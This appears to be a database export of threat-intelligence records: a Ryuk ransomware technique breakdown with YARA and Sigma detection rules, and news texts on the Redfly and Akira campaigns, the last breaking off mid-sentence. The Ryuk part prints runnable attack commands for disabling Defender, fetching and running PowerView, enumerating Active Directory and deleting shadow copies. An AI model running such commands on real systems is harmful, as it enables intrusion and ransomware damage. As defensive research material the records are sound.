Emotet. With RDP, a cybercriminal can\ninstall and execute Ryuk directly on the target machine or leverage their access to reach and\ninfect other, more valuable systems on the network. This Emotet Trojan can download additional\nmalware onto an infected machine that retrieves and executes Trickbot, which acts as spyware.\nThis Trickbot spyware collects admin credentials, browser passwords, credit cards, network\ndiscovery, and other intel. Attackers use the data collected in the previous stage to move to\ncritical assets connected to the network laterally. The attack chain concludes when the attackers\nexecute Ryuk on these assets. This step entirely depends on whether the infection has spread\nto enough assets to inflict maximum impact to get enough leverage to demand a large sum.\nThus, it becomes the deciding factor for whether the Ryuk ransomware should be deployed.\nRyuk uses a combination of encryption algorithms, including a symmetric algorithm (AES-256)\nand an asymmetric one (RSA 4096). The ransomware encrypts a file with the symmetric\nalgorithm and includes a copy of the symmetric encryption key encrypted with the RSA public\nkey. Ryuk deliberately avoids encrypting certain file types (including .exe and .dll) and files in\nspecific folders on the system. Thus decreasing the probability that Ryuk will break an infected\n\n\fcomputer, making file retrieval more difficult or impossible even if a ransom is paid. Upon\npayment of the ransom, the Ryuk operator provides:\nA copy of the corresponding RSA private key.\nEnabling decryption of the symmetric encryption key and.\nUsing it.\nThe encrypted files. A copy of the corresponding RSA private key. Enabling decryption of the\nsymmetric encryption key and. Using it. The encrypted files. Using the vssadmin resize to resize\nthe shadow storage vssadmin Delete Shadow /all /quiet Ryuk (second-stage):\n8b0a5fb13309623c3518473551cb1f55d38d8450129d4a3c16b476f7b2867d7 Dropper:\n23f8aa94ffb3c08a62735fe7fee5799880a8f322ce1d55ec49a13a3f85312db2 MD5 Hashes:\nT1059 - Command and Scripting Interpreter Ryuk has used cmd.exe to create a Registry entry\nto establish persistence and create directory for Ryuk AD scan.\n1`cmd /c mkdir %TEMP%\\ryuk` T1059.001 - PowerShell Ryuk uses powershell to configure the\nMicrosoft Defender Real-Time scanning. It also uses to compress files into archives.\n1`powershell Set-MpPreference -DisableRealtimeMonitoring $false`, `powershell\n\"Compress-Archive $env:TEMP\\ryuk\\ryuk_adf $env:TEMP\\ryuk\\ryuk_adf.zip\"` T1059.003 -\nWindows Command Shell Ryuk has used cmd.exe to create a Registry entry to establish\npersistence. T1053 - Scheduled Task/Job Ryuk can remotely create a scheduled task to\nexecute itself on a system.\n1`cmd /c SCHTASKS /QUERY /TN \"RyukAttack\"` T1053.005 - Scheduled Task/Job: Scheduled\nTask Ryuk can remotely create a scheduled task to execute itself on a system.\n1`cmd /c SCHTASKS /CREATE /SC DAILY /TN \"RyukAttack\" /TR\n\"C:\\Windows\\System32\\calc.exe\" /ST 11:00 /F` T1106 - Native API Ryuk has used multiple\nnative APIs including ShellExecuteW to run executables,GetWindowsDirectoryW to create\nfolders, and VirtualAlloc, WriteProcessMemory, and CreateRemoteThread for process\ninjection.[1] T1547.001 - Registry Run Keys / Startup Folder Ryuk has used the Windows\ncommand line to create a Registry entry under\nHKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run to establish\npersistence. T1055 - Process Injection Ryuk has injected itself into remote processes to encrypt\nfiles using a combination of VirtualAlloc, WriteProcessMemory, and CreateRemoteThread.\nT1134 - Access Token Manipulation Ryuk has attempted to adjust its token privileges to have\nthe SeDebugPrivilege. T1140 - Deobfuscate/Decode Files or Information Ryuk uncompresses\nthe dowloaded archive in a temporary directory.\n1`cmd /c powershell -Command Expand-Archive \"$env:TEMP\\ryuk\\AdFind.zip\" -DestinationPath\n\"$env:TEMP\\ryuk\\\"` T1222.001 - File and Directory Permissions Modification: Windows File and\nDirectory Permissions Modification Ryuk can launch icacls /grant Everyone:F /T /C /Q to delete\nevery access-based restrictions on files and directories. T1562.001 - Impair Defenses: Disable\nor Modify Tools Ryuk has stopped services related to anti-virus. Ryuk used encoded powershell\ncommand to disable Microsoft Windows Defender Service. (Set-MpPreference\n-DisableRealtimeMonitoring $true)\n1powershell.exe -nop -exec bypass -EncodedCommand\nSQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbAB\npAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0\nAHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgA3ADgAMAAxAC8AJwApADsAIABTA\n\n\fGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBEAGkAcwBhAGIAbABlAFIAZ\nQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAAJAB0AHIAdQBlAA==\"\nT1036 - Masquerading Ryuk can create .dll files that actually contain a Rich Text File format\ndocument. T1036.005 - Match Legitimate Name or Location Ryuk has constructed legitimate\nappearing installation folder paths by calling GetWindowsDirectoryW and then inserting a null\nbyte at the fourth character of the path. For Windows Vista or higher, the path would appear as\nC:\\Users\\Public. T1027 - Obfuscated Files or Information Ryuk can use anti-disassembly and\ncode transformation obfuscation techniques. T1205 - Traffic Signaling Ryuk has used\nWake-on-Lan to power on turned off systems for lateral movement. T1018 - Remote System\nDiscovery Ryuk uses cmd.exe and powershell.exe to discover remote systems.\n1cmd /c \"net view /all\"\n2cmd /c \"net view /all /domain\"\n3powershell.exe -exec bypass -Command \"&{[Net.ServicePointManager]::SecurityProtocol =\n[Net.SecurityProtocolType]::Tls12;IEX (IWR\n'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246\nd9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-NetSubnet;\nGet-NetComputer}\" T1057 - Process Discovery Ryuk has called CreateToolhelp32Snapshot to\nenumerate all running processes.\n1`cmd /c tasklist` T1082 - System Information Discovery Ryuk has called GetLogicalDrives to\nemumerate all mounted drives, and GetDriveTypeW to determine the drive type.\n1cmd /c sysinfo\n2curl\nhttps://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1\n-o $env:Temp\\ryuk\\pv.ps1\n3Import-Module $env:Temp\\ryuk\\pv.ps1\n4Invoke-CheckLocalAdminAccess\n5Find-LocalAdminAccess\n6Get-NetSubnet\n7Get-NetComputer\n8net config workstation T1083 - File and Directory Discovery Ryuk has enumerated files and\nfolders on all mounted drives. T1087 - Account Discovery Ryuk may attempt to get a listing of\naccounts on a system or within an environment.\n1`cmd /c net group \"Enterprise Admins\" /domain\"` T1087.002 - Domain Account Ryuk has the\nability to identify domain administrator accounts.\n1`cmd /c net group \"Domain Admins\" /do` T1482 - Domain Trust Discovery Ryuk use Nltest\ntools to obtain information about the domain.\n1`cmd /c nltest /domain_trusts > %USERPROFILE%\\Desktop\\ryuk\\ryuk_adf\\ad_trustdmp.txt`,\n`cmd /c nltest /dclist:` T1614.001 - System Location Discovery: System Language Discovery\nRyuk has been observed to query the registry key\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language and the value\nInstallLanguage. If the machine has the value 0x419 (Russian), 0x422 (Ukrainian), or 0x423\n(Belarusian), it stops execution. T1016 - System Network Configuration Discovery Ryuk has\ncalled GetIpNetTable in attempt to identify all mounted drives and hosts that have Address\n\n\fResolution Protocol (ARP) entries. T1518 - Software Discovery Ryuk can query the registry to\nget the list of software installed.\n1Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* |\nSelect-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize\n2Get-ItemProperty\nHKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object\nDisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize T1518.001 -\nSecurity Software Discovery Ryuk can query the CIM instance for the SecurityCenterv2\nnamespace to query the installed antivirus product name.\n1`Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct` T1071 -\nApplication Layer Protocol Ryuk may communicate using application layer protocols to avoid\ndetection/network filtering by blending in with existing traffic. T1105 - Ingress Tool Transfer Ryuk\ntransfers a batch script designed to kill a list of processes and services as mentioned above.\nRyuk uses adfind.exe to query active directory.\n1curl https://www.joeware.net/downloads/files/AdFind.zip -o $env:TEMP\\ryuk\\af.zip\n2Expand-Archive $env:TEMP\\ryuk\\af.zip -DestinationPath $env:TEMP\\ryuk\\af\n3\n4cd $env:TEMP\\ryuk\\af\n5.\\AdFind.exe -f \"(objectcategory=person)\" > $env:TEMP\\ryuk\\af\\ad_users.txt\n6.\\AdFind.exe -f \"objectcategory=computer\" >$env:TEMP\\ryuk\\af\\ad_computers.txt\n7.\\AdFind.exe -sc trustdmp > $env:TEMP\\ryuk\\af\\trustdmp.txt\n8.\\AdFind.exe -subnets -f (objectCategory=subnet)> $env:TEMP\\ryuk\\af\\subnets.txt\n9.\\AdFind.exe -gcb -sc trustdmp > $env:TEMP\\ryuk\\af\\trustdmp.txt\n10.\\AdFind.exe -sc domainlist > $env:TEMP\\ryuk\\af\\domainlist.txt\n11.\\AdFind.exe -sc dcmodes > $env:TEMP\\ryuk\\af\\dcmodes.txt\n12.\\AdFind.exe -sc adinfo > $env:TEMP\\ryuk\\af\\adinfo.txt\n13.\\AdFind.exe -sc dclist > $env:TEMP\\ryuk\\af\\dclist.txt\n14.\\AdFind.exe -sc computers_pwdnotreqd > $env:TEMP\\ryuk\\af\\computer_pwdnotereqd.txt\n15\n16 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\n17 IEX (IWR\n'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246\nd9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare\n-CheckShareAccess -Verbose T1573 - Encrypted Channel Ryuk may employ a known\nencryption algorithm to conceal command and control traffic rather than relying on any inherent\nprotections provided by a communication protocol. T1074 - Data Staged Ryuk may stage\ncollected data in a central location or directory prior to Exfiltration. Data may be kept in separate\nfiles or combined into one file through techniques such as Archive Collected Data.\n1 `powershell \"Compress-Archive $env:TEMP\\ryuk\\ryuk_adf $env:TEMP\\ryuk\\ryuk_adf.zip\"`\nT1021.002 - Remote Services: SMB/Windows Admin Shares Ryuk has used the C$ network\nshare for lateral movement. T1078.002 - Valid Accounts: Domain Accounts Ryuk can use stolen\ndomain admin accounts to move laterally within a victim domain. T1078.003 - Valid Accounts:\nLocal Accounts Adversaries may obtain and abuse credentials of a local account as a means of\ngaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.\n\n\f1[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\n2IEX (IWR\n'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246\nd9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing);\n3Invoke-CheckLocalAdminAccess\n4Find-LocalAdminAccess T1041 - Exfiltration Over C2 Channel\n1type %TEMP%\\ryuk\\af\\ad_users.txt\n2type %TEMP%\\ryuk\\af\\ad_computers.txt\n3type %TEMP%\\ryuk\\af\\trustdmp.txt\n4type %TEMP%\\ryuk\\af\\subnets.txt\n5type %TEMP%\\ryuk\\af\\trustdmp.txt\n6type %TEMP%\\ryuk\\af\\domainlist.txt\n7type %TEMP%\\ryuk\\af\\dcmodes.txt\n8type %TEMP%\\ryuk\\af\\adinfo.txt\n9type %TEMP%\\ryuk\\af\\dclist.txt\n10type %TEMP%\\ryuk\\af\\computer_pwdnotereqd.txt\n11type %TEMP%\\ryuk\\af\\ad_trustdmp.txt T1486 - Data Encrypted for Impact Ryuk has used a\ncombination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Files have\nbeen encrypted with their own AES key and given a file extension of .RYK. Encrypted\ndirectories have had a ransom note of RyukReadMe.txt written to the directory. T1490 - Inhibit\nSystem Recovery Ryuk has used vssadmin Delete Shadows /all /quiet to to delete volume\nshadow copies and vssadmin resize shadowstorage to force deletion of shadow copies created\nby third-party applications. T1489 - Service Stop Ryuk has called kill.bat for stopping services,\ndisabling services and killing processes. net view net group nltest -EncodedCommand flag\nadfind.exe powerview.ps1 Using splunk to detect Ryuk Ransomware:\nhttps://www.splunk.com/en_us/blog/security/detecting-ryuk-using-splunk-attack-range.html\nHere's a Yara rule submitted by Marc Elias and Christian Beek of the McAfee ATR Team\n1 rule Ryuk_Ransomware {\n2\n3 meta:\n4\n5\n6\n7\n8\n9\n10\n11\n12\n13\n\"https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to\n-attribution-misses-the-point/\"\n14\n15\n\ndescription = \"Ryuk Ransomware hunting rule\"\nauthor = \"Christiaan Beek - McAfee ATR team\"\ndate = \"2019-04-25\"\nrule_version = \"v2\"\nmalware_type = \"ransomware\"\n\nmalware_family = \"Ransom:W32/Ryuk\"\nactor_type = \"Cybercrime\"\nactor_group = \"Unknown\"\nreference =\n\n\f$s2 = \"fg4tgf4f3.dll\" fullword wide\n$s3 = \"lsaas.exe\" fullword wide\n$s4 = \"\\\\Documents and Settings\\\\Default User\\\\sys\" fullword wide\n$s5 = \"\\\\Documents and Settings\\\\Default User\\\\finish\" fullword wide\n$s6 = \"\\\\users\\\\Public\\\\sys\" fullword wide\n$s7 = \"\\\\users\\\\Public\\\\finish\" fullword wide\n$s8 = \"You will receive btc address for payment in the reply letter\" fullword ascii\n$s9 = \"hrmlog\" fullword wide\n$s10 = \"No system is safe\" fullword ascii\n$s11 = \"keystorage2\" fullword wide\n$s12 = \"klnagent\" fullword wide\n$s13 = \"sqbcoreservice\" fullword wide\n$s14 = \"tbirdconfig\" fullword wide\n$s15 = \"taskkill\" fullword wide\n\n$x1 = \"C:\\\\Windows\\\\System32\\\\cmd.exe\" fullword ascii\n$x2 = \"\\\\System32\\\\cmd.exe\" fullword wide\n$s1 = \"C:\\\\Users\\\\Admin\\\\Documents\\\\Visual Studio\n\n16 strings:\n17\n18\n19\n20\n2015\\\\Projects\\\\ConsoleApplication54new crypted\" ascii\n21\n22\n23\n24\n25\n26\n27\n28\n29\n30\n31\n32\n33\n34\n35\n36\n37\n38\n39 condition:\n40\n41\n42\n43\n44\n45\n46\n47 }\n48\n49 rule Ransom_Ryuk_sept2020 {\n50 meta:\n51\n52\n53\n54\n55\n56\n57\n58\n\n( uint16(0) == 0x5a4d and\nfilesize < 400KB and\n( 1 of ($x*) and\n4 of them ) and\nall of ($op*)) or\n( all of them )\n\n$op0 = { 8b 40 10 89 44 24 34 c7 84 24 c4 }\n$op1 = { c7 44 24 34 00 40 00 00 c7 44 24 38 01 }\n\ndescription = \"Detecting latest Ryuk samples\"\nauthor = \"McAfe ATR\"\ndate = \"2020-10-13\"\nmalware_type = \"ransomware\"\nmalware_family = \"Ransom:W32/Ryuk\"\nactor_type = \"Cybercrime\"\nactor_group = \"Unknown\"\nhash1 = \"cfdc2cb47ef3d2396307c487fc3c9fe55b3802b2e570bee9aea4ab1e4ed2ec28\"\n\n\f$x8 = \"W/C REG DELETE\n\n$x1 = \"\\\" /TR \\\"C:\\\\Windows\\\\System32\\\\cmd.exe /c for /l %x in (1,1,50) do start\n\n$x2 = \"cmd.exe /c \\\"bcdedit /set {default} recoveryenabled No & bcdedit /set {default}\\\"\"\n\n$x3 = \"cmd.exe /c \\\"bootstatuspolicy ignoreallfailures\\\"\" fullword ascii\n$x4 = \"cmd.exe /c \\\"vssadmin.exe Delete Shadows /all /quiet\\\"\" fullword ascii\n$x5 = \"C:\\\\Windows\\\\System32\\\\cmd.exe\" fullword ascii\n$x6 = \"cmd.exe /c \\\"WMIC.exe shadowcopy delete\\\"\" fullword ascii\n$x7 = \"/C REG ADD\n\n$x9 = \"\\\\System32\\\\cmd.exe\" fullword wide\n$s10 = \"Ncsrss.exe\" fullword wide\n$s11 = \"lsaas.exe\" fullword wide\n$s12 = \"lan.exe\" fullword wide\n$s13 = \"$WGetCurrentProcess\" fullword ascii\n$s14 = \"\\\\Documents and Settings\\\\Default User\\\\sys\" fullword wide\n$s15 = \"Ws2_32.dll\" fullword ascii\n$s16 = \" explorer.exe\" fullword wide\n$s17 = \"e\\\\Documents and Settings\\\\Default User\\\\\" fullword wide\n$s18 = \"\\\\users\\\\Public\\\\\" fullword ascii\n$s19 = \"\\\\users\\\\Public\\\\sys\" fullword wide\n$s20 = \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\\" fullword\n\n59 strings:\n60\nwordpad.exe /p \" fullword ascii\n61\nfullword ascii\n62\n63\n64\n65\n66\n\\\"HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\" /v \\\"EV\\\" /t\nREG_SZ /d \\\"\" fullword wide\n67\n\\\"HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\" /v \\\"EV\\\"\n/f\" fullword wide\n68\n69\n70\n71\n72\n73\n74\n75\n76\n77\n78\n79\nascii\n80\n81\n82\n83\n84 condition:\n85\n86\n87\n88\n89 }\n90\n91 rule RANSOM_RYUK_May2021 : ransomware\n92 {\n93\n94\n95\n\n$seq0 = { 2b c7 50 e8 30 d3 ff ff ff b6 8c }\n$seq1 = { d1 e0 8b 4d fc 8b 14 01 89 95 34 ff ff ff c7 45 }\n$seq2 = { d1 e0 8b 4d fc 8b 14 01 89 95 34 ff ff ff c7 45 }\n\ndescription = \"Rule to detect latest May 2021 compiled Ryuk variant\"\nauthor = \"Marc Elias | McAfee ATR Team\"\n\n( uint16(0) == 0x5a4d and\nfilesize < 400KB and\n( 1 of ($x*) and 5 of them ) and\nall of ($seq*)) or ( all of them )\n\nmeta:\n\n\f$sleep_constants = { 68 F0 49 02 00 FF (15|D1) [0-4] 68 ?? ?? ?? ?? 6A 01 }\n$icmp_echo_constants = { 68 A4 06 00 00 6A 44 8D [1-6] 5? 6A 00 6A 20 [5-20] FF\n\nstrings:\n\ncondition:\n\nversion = \"0.1\"\n\ndate = \"2021-05-21\"\nhash =\n\n$ryuk_filemarker = \"RYUKTM\" fullword wide ascii\n\n96\n97\n\"8f368b029a3a5517cb133529274834585d087a2d3a5875d03ea38e5774019c8a\"\n98\n99\n100\n101\n102\n103\n104\n15 }\n105\n106\nuint16(0) == 0x5a4d\n107\nand uint32(uint32(0x3C)) == 0x00004550\n108\nand filesize < 200KB\n109\nand ( $ryuk_filemarker\n110\nor ( $sleep_constants\n111\n112\nand $icmp_echo_constants ))\n113 } Ryuk Behaviour Detection using Sigma Rules:\n1title: Ryuk Ransomware\n2id: c37510b8-2107-4b78-aa32-72f251e7a844\n3status: test\n4description: Detects Ryuk ransomware activity\n5author: Florian Roth\n6references:\n7 - https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/\n8date: 2019/12/16\n9modified: 2021/11/27\n10logsource:\n11category: process_creation\n12product: windows\n13detection:\n14selection:\n15 CommandLine|contains|all:\n16 - 'Microsoft\\Windows\\CurrentVersion\\Run'\n17 - 'C:\\users\\Public\\'\n18condition: selection\n19fields:\n20 - CommandLine\n21 - ParentCommandLine\n22falsepositives:\n23 - Unlikely\n24level: critical\n\n\f25tags:\n26 - attack.persistence\n27 - attack.t1547.001 RYUK Ransomware Ryuk Ransomware Detailed Analysis Ryuk targetting\nweb servers The Curious Case of Ryuk Ransomware Ryuk Ransomware: The complete\nbreakdown Ryuk over time Deep Analysis Ryuk Latest Ryuk Trends AnyRun Sim Scythe\nSimulation Playbook Incubation Blog Partners About Us Privacy Policy Terms of Service FAQ\nWhat is BAS? Breach and Attack Simulation Automated Penetration Testing Continuous\nAutomated Red Teaming Twitter GitHub LinkedIn NCOE-DSCI\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-12T20:43:57.715Z"
  },
  "added_by": "bZWMRuiSPjWGfbhDpDVPLRBkixL2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6501fa9df437d158ed9d9023"
  },
  "name": "Redfly Targets Critical Infrastructure",
  "file_type": null,
  "website_url": "https://www.bleepingcomputer.com/news/security/redfly-hackers-infiltrated-power-suppliers-network-for-6-months/",
  "website_title": "Redfly hackers infiltrated power suppliers network",
  "file_name": null,
  "file_size": null,
  "content": "An espionage threat group tracked as 'Redfly' hacked a national electricity grid organization in Asia and quietly maintained access to the breached network for six months. These new findings come from Symantec, who found evidence of ShadowPad malware activity in the organization's network between February 28 and August 3, 2023, along with keyloggers and specialized file launchers. Although ShadowPad is a widely available trojan that multiple APT groups use, Symantec tracks the recent attacks separately, reporting that Redfly appears to have an exclusive focus on critical national infrastructure. The ShadowPad variant seen in the attacks masquerades its components (exe and dll) as VMware files, dropping them on the victim's filesystem. The program also achieves persistence by creating services named after VMware again, set to launch the malicious executable and DLL upon system boot. In general, ShadowPad is a versatile modular RAT that supports data exfiltration to the C2, keystroke recording, file searching and file operations, and remote command execution. Multiple APTs use it because it is not associated with a single actor, making attribution and tracking harder for analysts. In the observed attacks, Redfly used a separate keylogging tool that captured keystrokes in log files on the breached system, which the attackers retrieved manually. Another tool the espionage hackers use is Packerloader, employed for loading and executing shellcode inside AES encrypted files capable of evading AV detection. The attackers were seen using this tool to execute code that modified a driver file's permissions, subsequently used for creating credential dumps in the Windows registry (for future retrieval) and wiping Windows security event logs. Redfly also uses PowerShell to execute commands that help them gather details about specific storage devices on the compromised system. For lateral movement, the hackers use DLL side-loading and legitimate executables, scheduled tasks executing legitimate binaries, and stolen credentials. Redfly also employed renamed versions of known tools, like ProcDump, to dump credentials from LSASS and then use them to authenticate on adjacent systems. The lengthy dwell period seen in this attack is characteristic of espionage actors who infect systems and keep a low profile to collect as much intelligence as possible. While the attackers' intent to disrupt the power supply remains uncertain, the potential risk poses a significant threat.  \"Attacks against CNI targets are not unprecedented. Almost a decade ago, Symantec uncovered the Russian-sponsored Dragonfly group's attacks against the energy sector in the U.S. and Europe,\" concluded Symantec's report. \"More recently, the Russian Sandworm group mounted attacks against the electricity distribution network in Ukraine that were directed at disrupting electricity supplies.\" Such disruption could have resulted in extensive damage to the energy provider's customers and profound economic repercussions for the entire nation. Microsoft: Stealthy Flax Typhoon hackers use LOLBins to evade detection Hackers use public ManageEngine exploit to breach internet org New malware infects business routers for data theft, surveillance Microsoft PowerShell Gallery vulnerable to spoofing, supply chain attacks Major U.S. energy org targeted in QR code phishing attack Not a member yet? Register Now MGM Resorts shuts down IT systems after cyberattack Microsoft will block 3rd-party printer drivers in Windows Update Terms of Use - Privacy Policy - Ethics Statement - Affiliate Disclosure Copyright @ 2003 - 2023 Bleeping Computer® LLC - All Rights Reserved           NEWS           DOWNLOADS           VPNS      VIRUS REMOVAL GUIDES                TUTORIALS           DEALS      FORUMS MORE       Home News Security 'Redfly' hackers infiltrated power supplier's network for 6 months    September 12, 2023 06:00 AM 0 ENERGY ESPIONAGE LATERAL MOVEMENT POWERSHELL RAT REDFLY SHADOWPAD      PREVIOUS ARTICLE NEXT ARTICLE MGM Resorts shuts down IT systems after cyberattack Microsoft will block 3rd-party printer drivers in Windows Update      News VPN Buyer Guides Downloads Virus Removal Guides Tutorials Startup Database Uninstall Database Glossary Forums Forum Rules Chat Welcome Guide Sitemap About BleepingComputer Contact Us Send us a Tip! Advertising Write for BleepingComputer Social & Feeds Changelog",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "added_on": {
    "$date": "2023-09-13T18:08:29.585Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_on": {
    "$date": "2023-09-13T18:17:53.130Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "650323234a82011bb9812ff8"
  },
  "name": "Akira",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Akira.pdf",
  "file_size": "91 KB",
  "content": "The fledgling Akira ransomware group is building momentum and expanding its target\n\nbase, following other cybercriminal groups by adding capabilities to exploit Linux\n\nsystems as part of a growing sophistication in its activity, researchers have found.\n\nThe gang, which emerged as a cybercriminal force to be reckoned with in April of this\n\nyear, is primarily known for attacking Windows systems, and maintains a unique\n\ndata-leak site designed as an interactive command prompt using jQuery.\n\nHowever, the group  named for a 1988 Japanese anime cult classic featuring a\n\npsychopathic biker  is now shifting its tactics to target Linux, with a new version of its\n\nransomware that can exploit systems running the open source OS, researchers from\n\nCyble Research and Intelligence Labs (CRIL) revealed in a blog post published June\n\n29.\n\nThis move both reflects Akira's evolution as well as a growing trend among ransomware\n\ngroups, who now see the opportunity in exploiting the popularity of Linux across\n\nenterprise environments. Linux has become the de facto standard for running virtual\n\ncontainer-based systems, which are typically the back end for Internet of Things (IoT)\n\ndevices and mission-critical applications.\n\n\"The fact that a previously Windows-centric ransomware group is now turning its\n\nattention to Linux underscores the increasing vulnerability of these systems to cyber\n\nthreats,\" the researchers wrote in the post.\n\nIndeed, the shift by Akira follows a move by other, more established ransomware \n\nsuch as Cl0p, Royal, and IceFire ransomware groups  to do the same.\n\nAkira is also expanding rapidly, having in just a few months already compromised 46\n\npublicly disclosed victims  the majority of which are located in the US, the researchers\n\nsaid.\n\nVictims span various industries, but the bulk of the victims have come from the\n\neducation sector, followed close behind by manufacturing, professional services, BFSI,\n\n\fand construction. Other victims are scattered across assorted verticals, including\n\nagriculture and livestock, food and beverage, IT and ITES, real estate, consumer goods,\n\nautomotive, chemical, and other industries, they said.\n\nAkira primarily is focused on compromising and stealing data from its victims using\n\ndouble-extortion tactics, threatening to leak data on the Dark Web if they don't pay the\n\nrequested ransom.\n\nThe new Linux ransomware file infects systems in the form of a console-based 64-bit\n\nexecutable written in Microsoft Visual C/C++ compiler, the researchers said. Upon\n\nexecution, it uses the API function GetLogicalDriveStrings() to obtain a list of the logical\n\ndrives currently available in the system.\n\nThe malware then drops a ransom note in multiple folders with the file name\n\n\"akira_readme.txt,\" and proceeds to search for files and directories to encrypt by\n\niterating through them using the API functions FindFirstFileW() and FindNextFileW().\n\nThe ransomware uses the \"Microsoft Enhanced RSA and AES Cryptographic Provider\"\n\nlibraries to encrypt the victim's machine using a fixed hardcoded base64 encoded public\n\nkey, renaming encrypted files with the \".akira\" extension. It also uses several functions\n\nfrom CryptoAPI in its encryption process, the researchers said.\n\nAkira ransomware also includes an additional features that prevents system restoration\n\nusing a PowerShell command to execute a WMI query that deletes the shadow copy,\n\nthey added.\n\nThe dropped ransom note provides instructions to the victims for contacting Akira to\n\nnegotiate terms for paying a ransom. The group often threatens victims with plans to\n\nleak the data on its ransomware site (aka double extortion), which indeed displays a list\n\nof victims that didn't pay and associated leaks of their data, the researchers said.\n\nResearchers made a number of recommendations for how organizations can prevent\n\nand mitigate ransomware attacks. They include conducting regular backup practices\n\n\fand keeping those backups offline or in a separate network so that systems can be\n\nrestored in case of attack, they said.\n\nOrganizations also should turn on the automatic software update feature on computers\n\nas well as other mobile and connected devices wherever possible and pragmatic, and\n\nuse reliable and trusted antivirus and Internet security software package on all\n\nconnected devices, the researchers advised.\n\nAs ransomware often hitches a ride on files spread through phishing attacks, corporate\n\nusers also should refrain from opening untrusted links and email attachments without\n\nverifying their authenticity, they added.\n\nThe steps taken after a ransomware attack also have an impact on how extensive the\n\ndamage to a network is. If ransomware is detected on an enterprise system,\n\norganizations should immediately detach infected devices on the same network,\n\ndisconnect any connected external storage devices, and inspect system logs for\n\nsuspicious events, the researchers added.\n\nWhile another ransomware named Akira was released in 2017, it is not\n\nbelieved that these operations are related.\n\nA sample of the Akira ransomware was discovered by MalwareHunterTeam,\n\nwho shared a sample with BleepingComputer so we could analyze it.\n\nWhen executed, Akira will delete Windows Shadow Volume Copies on the\n\ndevice by running the following PowerShell command:\n\n\fThe ransomware will then proceed to encrypt files that contain the following\n\nfile extensions:\n\nWhile encrypting, the encryptor will skip files found in the Recycle Bin,\n\nSystem Volume Information, Boot, ProgramData, and Windows folders. It will\n\nalso avoid encrypting the Windows system files with .exe, .lnk, .dll, .msi, and\n\n.sys file extensions.\n\nWhen encrypting files, the ransomware encrypts files and appends the .akira\n\nextension will be appended to the file's name.\n\nFor example, a file named 1.doc would be encrypted and renamed to\n\n1.doc.akira, as shown in the encrypted folder below.\n\nAkira also uses the Windows Restart Manager API to close processes or shut\n\ndown Windows services that may be keeping a file open and preventing\n\nencryption.\n\nEach computer folder will contain a ransom note named akira_readme.txt\n\nthat includes information on what happened to a victim's files and links to the\n\nAkira data leak site and negotiation site.\n\n\"As for your data, if we fail to agree, we will try to sell personal\n\ninformation/trade secrets/databases/source codes - generally speaking,\n\neverything that has a value on the darkmarket - to multiple threat actors at\n\nones. Then all of this will be published in our blog,\" threatens the Akira\n\nransom note.\n\nEach victim has a unique negotiation password that is entered into the threat\n\nactor's Tor site. Unlike many other ransomware operations, this negotiation\n\n\fsite just includes a chat system that the victim can use to negotiate with the\n\nransomware gang.\n\nData leak site used to extort victims\n\nLike other ransomware operations, Akira will breach a corporate network and\n\nspread laterally to other devices. Once the threat actors gain Windows domain\n\nadmin credentials, they will deploy the ransomware throughout the network.\n\nHowever, before encrypting files, the threat actors will steal corporate data for\n\nleverage in their extortion attempts, warning victims that it will be publicly\n\nreleased if a ransom is not paid.\n\nThe Akira gang put a lot of effort into their data leak site, giving it a retro look\n\nwhere visitors can navigate it by typing in commands, as shown below.\n\nAt the time of this writing, Akira has leaked the data for four victims on their\n\ndata leak site, with the size of the leaked data ranging from 5.9 GB for one\n\ncompany to 259 GB for another.\n\nFrom negotiations seen by BleepingComputer, the ransomware gang demands\n\nransoms ranging from a $200,000 to millions of dollars.\n\nThey are also willing to lower ransom demands for companies 